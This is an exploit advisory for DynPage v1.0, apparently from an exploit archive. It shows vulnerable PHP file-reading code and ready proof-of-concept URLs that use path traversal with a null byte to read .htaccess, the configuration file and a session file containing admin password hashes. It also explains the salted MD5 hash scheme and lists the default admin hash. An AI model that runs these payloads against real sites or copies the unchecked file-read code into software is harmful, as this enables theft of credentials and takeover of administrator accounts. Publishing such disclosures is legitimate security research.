DynPage <= v1.0 Multiple Remote Vulnerabilities

2010-09-07T00:00:00
ID 1337DAY-ID-14014
Type zdt
Reporter Abysssec
Modified 2010-09-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================
DynPage <= v1.0 Multiple Remote Vulnerabilities
===============================================

- Title  : DynPage Multiple Remote Vulnerabilities.
- Affected Version : <= v1.0
- Vendor  Site   : http://www.dynpage.net
  
- Discovery : Abysssec.com
  
  
- Description :
===============
DynPage allows you to edit Websites online and make pieces of contents editable with a comfortable editor.
DynPage implements the CKeditor - one of the best Internet editors.
The integration of content into the HTML pages can be done with Ajax/Javascript or PHP - so you can also handle cross domain sites.
DynPage is written in PHP and does not require MySQL database. It's easy to install and to configurate.
 
- Vulnerabilities:
==================
1)Local File Disclosure:
---------------------
    +Code:
    /content/dynpage_load.php #[line(20-28)]:
 
    $filename = $_GET["file"];
    if (!is_dir ($filename) && file_exists ($filename)) {
     
        $bytes = filesize ($filename);
        $fh = fopen($filename, 'r');
        print (fread ($fh, $bytes));
        fclose ($fh);
 
    }
 
 
    +POC:
         http://www.Site.com/dynpage/content/dynpage_load.php?file=../.htaccess%00
 
 
2)Admin hash Disclosure:
---------------------------------
    The Admin password hash format: MD5('admin:'+$password)
    then password's salt is "admin:".
 
    2-a)Default password is admin,that stored in config_global.inc.php(line 41-42 )
            // Default login admin
            "default_login_hash" => "d2abaa37a7c3db1137d385e1d8c15fd2",
    +POC:for see this hash:
      http://www.Site.com/dynpage/content/dynpage_load.php?file=../config_global.inc.php%00
 
    2-b)the hash  password  stored as SESSION in /conf/init.inc.php.
        <?php
            // This file is generated automatically!
            // No not modify manually!
            $_SESSION['DYNPAGE_CONF_VAR_ALL']['login_hash']="2d08086927f4d87a31154aaf0ba2e067";
            $_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="[email protected]";
        ?>
    +POC:for see this hash:
      http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00



#  0day.today [2018-01-03]  #